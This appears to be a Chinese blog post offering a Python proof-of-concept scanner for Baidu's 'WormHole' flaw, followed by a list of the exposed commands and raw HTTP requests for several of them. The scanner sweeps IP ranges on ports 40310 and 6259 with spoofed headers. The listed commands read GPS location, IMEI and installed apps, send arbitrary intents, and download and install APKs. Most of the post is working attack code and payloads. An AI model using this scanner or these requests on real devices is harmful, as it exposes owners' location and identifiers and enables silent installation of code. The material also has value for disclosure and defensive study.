百度WormHole漏洞检测POC
WormHole的检测代码,随手python写的。
#exploit write by fenlog,baidu wormhole POC.
#QQ:345382462
import urllib2, urllib
import sys
headers = {
"Accept": "*/*",
"Host": "127.0.0.1",
"remote-addr": "127.0.0.1",
"Referer": "http://www.baidu.com/"
}
def ip2num(ip):
ip = [int(x) for x in ip.split('.')]
return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]
def num2ip(num):
return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)
def URLRequest(url):
try:
request = urllib2.Request(url = url,headers = headers)
response = urllib2.urlopen(request)
return response.read()
except:
return ""
if len(sys.argv) == 3:
ipstart = ip2num(sys.argv[1])
ipend = ip2num(sys.argv[2])
elif (len(sys.argv) == 2):
ipstart = ip2num(sys.argv[1])
ipend = ipstart
else:
print "Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (sys.argv[0], sys.argv[0])
exit(0)
if (ipstart > ipend):
print "Target IP Err"
exit(0)
urllib2.socket.setdefaulttimeout(3)
for targetip in range(ipstart, ipend + 1):
strip = num2ip(targetip)
print "Scan %s..." % (strip)
url1 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 40310)
url2 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 6259)
ret = URLRequest(url1)
if (len(ret) == 0):
ret = URLRequest(url2)
if (len(ret) > 0):
print "Found %s:%s" % (strip, ret)
print "Scan %d IPs Finish!" % (ipend - ipstart + 1)
附上一些其他的代码,仅供参考。
geolocation 获取用户手机的GPS地理位置(城市,经度,纬度)
getsearchboxinfo 获取手机百度的版本信息
getapn 获取当前的网络状况(WIFI/3G/4G运营商)
getserviceinfo 获取提供 nano http 的应用信息
getpackageinfo 获取手机应用的版本信息
sendintent 发送任意intent 可以用来打开网页或者与其他app交互
getcuid 获取imei
getlocstring 获取本地字符串信息
scandownloadfile 扫描下载文件(UCDownloads/QQDownloads/360Download...)
addcontactinfo 给手机增加联系人
getapplist获取全部安装app信息
downloadfile 下载任意文件到指定路径如果文件是apk则进行安装
uploadfile 上传任意文件到指定路径 如果文件是apk则进行安装
//获取位置信息
GET /geolocation?timeout=45000&callback=getGeoByNative HTTP/1.1
Host: 127.0.0.1
remote-addr: 127.0.0.1
Referer: http://www.baidu.com/
//获取机器ID
GET /getcuid?secret=0&mcmdf=inapp_baidu_bdgjs&callback=_box_jsonp507 HTTP/1.1
Host: 127.0.0.1
remote-addr: 127.0.0.1
Referer: http://www.baidu.com/
//获取开放服务的应用信息
GET /getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp1 HTTP/1.1
Host: 127.0.0.1
remote-addr: 127.0.0.1
Referer: http://www.baidu.com/
//获取安装包版本
GET /getpackageinfo?packagename=com.tencent.mm&mcmdf=inapp_baidu_bdgjs&callback=jsonp1 HTTP/1.1
Host: 127.0.0.1
remote-addr: 127.0.0.1
Referer: http://www.baidu.com/
//发送任意intent 可以用来打开网页或者与其他app交互
GET /sendintent?mcmdf=inapp_baidu_bdgjs&intent=http://fenlog.com/&callback=jsonp1 HTTP/1.1
Host: 127.0.0.1
remote-addr: 127.0.0.1
Referer: http://www.baidu.com/
//获取全部安装app信息
GET /getapplist?mcmdf=inapp_baidu_bdgjs&callback=jsonp1 HTTP/1.1
Host: 127.0.0.1
remote-addr: 127.0.0.1
Referer: http://www.baidu.com/
留言列表: